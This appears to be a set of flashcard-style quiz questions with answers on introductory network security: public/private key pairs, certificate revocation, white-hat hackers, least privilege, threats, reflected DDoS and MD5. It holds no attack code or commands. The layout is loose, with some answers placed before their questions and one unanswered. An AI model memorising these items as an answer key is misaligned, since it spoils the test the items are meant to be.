Which of the following statements are true about public and private key pairs? A key pair is a set of two keys that work in combination with each other as a team. A key pair is a set of two keys that work in isolation. If you use the public key to encrypt data using an asymmetric encryption algorithm, the corresponding private key is used to decrypt the data. If you use the public key to encrypt data using an asymmetric encryption algorithm, the peer decrypts the data with that public key.
Subordinate CA servers can be invalidated.
Which of the following statements is true? Subordinate CA servers can be invalidated. Subordinate certificates cannot be invalidated. Root certificates cannot be invalidated. Root CAs cannot be invalidated.
White hat
Which type of hacker is considered a good guy? White hat Black hat Gray hat All of these answers are correct.
The principle of least privilege and separation of duties
You were hired to configure AAA services in an organization and are asked to make sure that users in the engineering department do not have access to resources that are only meant for the finance department. What authorization principle addresses this scenario? The principle of least privilege and separation of duties Accounting and MAC Auth-bypass Deter, delay, and detect Policy-based segmentation
Threat
_________ is any potential danger to an asset. Vulnerability Threat Exploit None of these answers is correct.
Reflected DDoS
____________ attacks occur when the sources of the attack are sent spoofed packets that appear to be from the victim, and then the sources become unwitting participants in the DDoS attacks by sending the response traffic back to the intended victim. Reflected DDoS Direct DoS Backtrack DoS SYN flood
Root Certificate
A root certificate contains the public key of the CA server and other details about the CA server.
MD5
produces a 128-bit (16-byte) hash value, typically expressed in text format as a 32-digit hexadecimal number.